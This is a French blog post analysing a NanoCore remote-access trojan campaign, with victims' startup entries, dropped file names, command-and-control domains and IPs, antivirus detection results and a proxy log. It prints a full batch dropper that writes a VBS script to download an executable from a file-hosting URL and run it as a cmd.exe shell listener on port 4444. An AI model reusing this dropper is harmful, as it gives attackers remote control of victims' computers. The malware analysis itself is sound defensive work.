Trojan NanoCore / Backdoor:MSIL/Noancooe : Exemple d’une Campagne

Hier et quelques jours auparavant, des sujets similaires pour une campagne du RAT (Remote Access Tool) NanoCore
NanoCore est donc un malware de type Backdoor qui permet le contrôle à distance de l’ordinateur et faire à peu près tout : contrôler la souris, effectuer des captures d’écran, activer la Webcam et probablement offrant des fonctionnalités de keylogger.

nanocore-rat

Les topics liés à la campagne observée :

Dans, les deux cas, les internautes se plaignent d’erreur 2>NUL au démarrage de la session Windows.

Nanocore_erreur_demarrage_session_2Null

Hidedrop_erreur_null

Dans les cas observés, les éléments malicieux :

CAS 1 et 2 avec le HideDrop.exe :

Startup: C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdate.hta [2016-02-03] ()
Startup: C:\Users\Robin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Thug.bat [2016-02-03] ()
2016-02-13 01:13 - 2016-02-13 01:53 - 01457692 _____ C:\Users\Public\HideDrop.exe
2016-02-13 01:13 - 2016-02-13 01:40 - 00000000 ____D C:\Users\Robin\AppData\Roaming\AD8CCADA-1488-4B87-BD90-7BDE48CBF58E
2016-02-13 01:13 - 2016-02-13 01:13 - 00937776 ___SH (AutoIt Team) C:\Users\Robin\AppData\Roaming\fbQJYbBUHWXaOGZGZd1.exe
2016-02-10 07:03 - 2016-02-10 07:03 - 00133136 ___SH C:\Users\Robin\AppData\Roaming\eJLPgUPSSXbdcISPN
2016-02-10 07:03 - 2016-02-10 07:03 - 00061322 ___SH C:\Users\Robin\AppData\Roaming\IQXXgbHVHSQIORgGPaP.au3
2016-02-03 20:25 - 2016-02-13 01:53 - 00430487 _____ C:\Users\Public\test.vbs
2016-02-03 20:25 - 2016-02-13 01:53 - 00000361 _____ C:\Users\Public\kill.vbs

Cas 3 avec EasyCom.exe :

Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdate.hta [2016-02-13] () 
 Startup: C:\Users\Papa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Thug.bat [2016-02-13] ()  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00430527 _____ C:\Users\Public\test.vbs  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00000361 _____ C:\Users\Public\kill.vbs  
 2016-02-14 19:01 - 2016-02-15 22:27 - 00000000 _____ C:\Users\Public\EasyComm.exe  
  2012-12-04 22:15 - 2015-03-09 07:52 - 0000340 _____ () C:\Users\Papa\AppData\Local\HackLogs.dat  
 2015-01-13 00:40 - 2015-01-13 00:40 - 0000001 _____ () C:\Users\Papa\AppData\Local\llftool.4.40.agreement 
 2012-12-04 22:14 - 2015-03-09 08:18 - 0000700 ___SH () C:\Users\Papa\AppData\Local\systemFL7.dat  
 2015-03-09 08:21 - 2015-03-09 08:22 - 0001906 ___SH () C:\Users\Papa\AppData\Local\win_fldb_sys.dat  
 2012-12-04 22:16 - 2015-03-09 07:55 - 0000000 ___SH () C:\Users\Papa\AppData\Local\win_lockerdb_sys.dat  
 2012-12-04 22:13 - 2015-03-09 08:23 - 0003465 ___SH () C:\Users\Papa\AppData\Local\win_stlthdb_sys.dat  
  2012-12-04 22:15 - 2012-12-04 22:15 - 0002568 ___SH () C:\ProgramData\win_mpwd_sys.dat  
C:\ProgramData\win_mpwd_sys.dat

Dans les deux cas, on retrouve les mêmes noms de fichiers Thug.bat et ChromeUpdate.hta se positionnant dans Startup afin de se lancer au démarrage de la session. Ce dernier télécharge et exécuté à chaque fois un binaire.
ChromeUpdate.hta du premier cas, utilisant PowerShell pour télécharger et installer le binaire HideDrop.exe :

NanoCore_Powershell_HTTP
Dans tous les cas, une connexion à une IP Ukrainienne Deltahost :

NanoCore_connexion_Ukraine_2 NanoCore_connexion_Ukraine

Cette campagne utilise des DNS fagdns.com :

microsecurhostx2.fagdns.com has address 176.107.176.60
176.107.176.60 – 60-176-107-176.deltahost.com.ua.

koerlnbiz.fagdns.com
91.229.79.229 – 229-79-229-91.deltahost.com.ua.

NanoCore_AutoIT_fagdns

On retrouve aussi l’utilisation du binaire AutoIT.exe pour charger un code source de Backdoor AutoIT.
Au départ, dans le premier cas, les détections antivirus étaient assez mauvaises puis se sont améliorés, le second cas, les détections sont bien meilleurs.

SHA256: d313d186508c73af3e2d0920306c3cbfb5a2355b8986f53eb4397e200f3c5e65
Nom du fichier : EasyComm.exe
Ratio de détection : 31 / 54
Date d’analyse : 2016-02-16 06:18:59 UTC (il y a 7 minutes)
Antivirus Résultat Mise à jour
ALYac AIT:Trojan.Autoit.CRC 20160216
AVG Autoit2_c.DLX 20160216
Ad-Aware AIT:Trojan.Autoit.CRC 20160216
AegisLab Ait.Troj.Autoit!c 20160216
Arcabit AIT:Trojan.Autoit.CRC 20160216
Avast Win32:Malware-gen 20160216
Avira DR/Autoit.A.19254 20160216
BitDefender AIT:Trojan.Autoit.CRC 20160216
Comodo UnclassifiedMalware 20160216
Cyren W32/GenBl.E491B7F8!Olympus 20160216
DrWeb Trojan.Packed.61655 20160216
ESET-NOD32 a variant of Win32/Injector.Autoit.CBV 20160216
Emsisoft AIT:Trojan.Autoit.CRC (B) 20160216
F-Secure AIT:Trojan.Autoit.CRC 20160216
Fortinet W32/Autoit.CRC!tr 20160216
GData AIT:Trojan.Autoit.CRC 20160216
Ikarus Trojan.Win32.Injector 20160216
K7AntiVirus Trojan ( 004ddc351 ) 20160215
K7GW Trojan ( 004ddc351 ) 20160216
Malwarebytes Trojan.Injector.AutoIt 20160216
McAfee Artemis!E491B7F87A44 20160216
McAfee-GW-Edition BehavesLike.Win32.Downloader.tc 20160216
MicroWorld-eScan AIT:Trojan.Autoit.CRC 20160216
Microsoft Backdoor:MSIL/Noancooe.C 20160216
NANO-Antivirus Trojan.Script.Agent.dzyotx 20160216
Panda Trj/CI.A 20160215
Qihoo-360 HEUR/QVM10.1.Malware.Gen 20160216
Sophos Mal/Generic-S 20160216
TrendMicro TROJ_GEN.R01TC0DBF16 20160216
VIPRE Trojan.Win32.Generic!BT 20160216
nProtect AIT:Trojan.Autoit.CRC 20160215

Cheval de troie : Autoit2_c.DLX chez AVG :

AVG_Cheval_Troie_Autoit2_c

et Backdoor:MSIL/Noancooe.C chez Microsoft :Backdoor_MSIL_Naancooe

Sur le premier cas, je n’avais pas tilté, mais le second cas télécharge le binaire sur demo ovh :

1424262978.146 1583 192.168.1.101 TCP_MISS/200 1462039 GET http://demo.ovh.eu/download/efd0b3b86f5172334ee4347fdb4643c8/EasyComm.exe - DIRECT/188.165.12.227 application/octet-stream

Je me suis alors souvenu d’un sujet plus ou moins similaire : Infection cheval de troie (TeamSpeak)

il s’agissait d’une infection tirant partie d’une vulnérabilité sur TeamSpeak qui téléchargé et installé des scripts VBS et un binaire téléchargé sur Demo OVH.

echo 2> %public%\test.vbs
@echo off
@echo dim rgkzher > %public%\test.vbs
@echo dim dlmihjz >> %public%\test.vbs
@echo dim mlifgjs >> %public%\test.vbs
@echo set rgkzher = CreateObject("Microsoft.XMLHTTP") >> %public%\test.vbs
@echo set dlmihjz = CreateObject("ADODB.Stream") >> %public%\test.vbs
@echo set mlifgjs = CreateObject("WScript.Shell") >> %public%\test.vbs
@echo jkhzbeeh = "http://demo.ovh.eu/download/2aede7152ddbe275332d3bef7b68c469/Setup.exe" >> %public%\test.vbs
@echo vsahxga = "%public%\Setup.exe" >> %public%\test.vbs
@echo pouaregq = "%public%\Setup.exe -L -p 4444 -e cmd.exe" >> %public%\test.vbs
@echo rgkzher.open "GET", jkhzbeeh, False >> %public%\test.vbs
@echo rgkzher.send >> %public%\test.vbs
@echo dlmihjz.type = 1 >> %public%\test.vbs
@echo dlmihjz.open >> %public%\test.vbs
@echo dlmihjz.write rgkzher.responseBody >> %public%\test.vbs
@echo dlmihjz.savetofile vsahxga, 2 >> %public%\test.vbs
@echo mlifgjs.run pouaregq >> %public%\test.vbs

start %public%\test.vbs

Encore DeltaHost :
NanoCore_AutoIT_ftp_demo_ovh_2et on retrouve Thug.bat et Chrome.bat ainsi que Demo OVH.

NanoCore_AutoIT_ftp_demo_ovh

Bref, probablement le même groupe derrière ces campagnes.
Je n’ai pas la méthode de propagation des derniers cas, bien entendu, si j’ai des nouvelles, je viendrai éditer le topic.

A suivre !

EDIT – de retour avec DragonUp.exe

Recroisé sur commentcamarche.net : http://www.commentcamarche.net/forum/affich-33346551-dragonup-exe-trojan-nanocore
Le code est identique aux versions précédentes.

Trojan_nanocore_DragonUp_exe

Print Friendly
(Visité 818 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Les Tags : #Windows10 - #Windows - #Tutoriel - #Virus - #Antivirus - #navigateurs WEB - #Securité - #Réseau - #Internet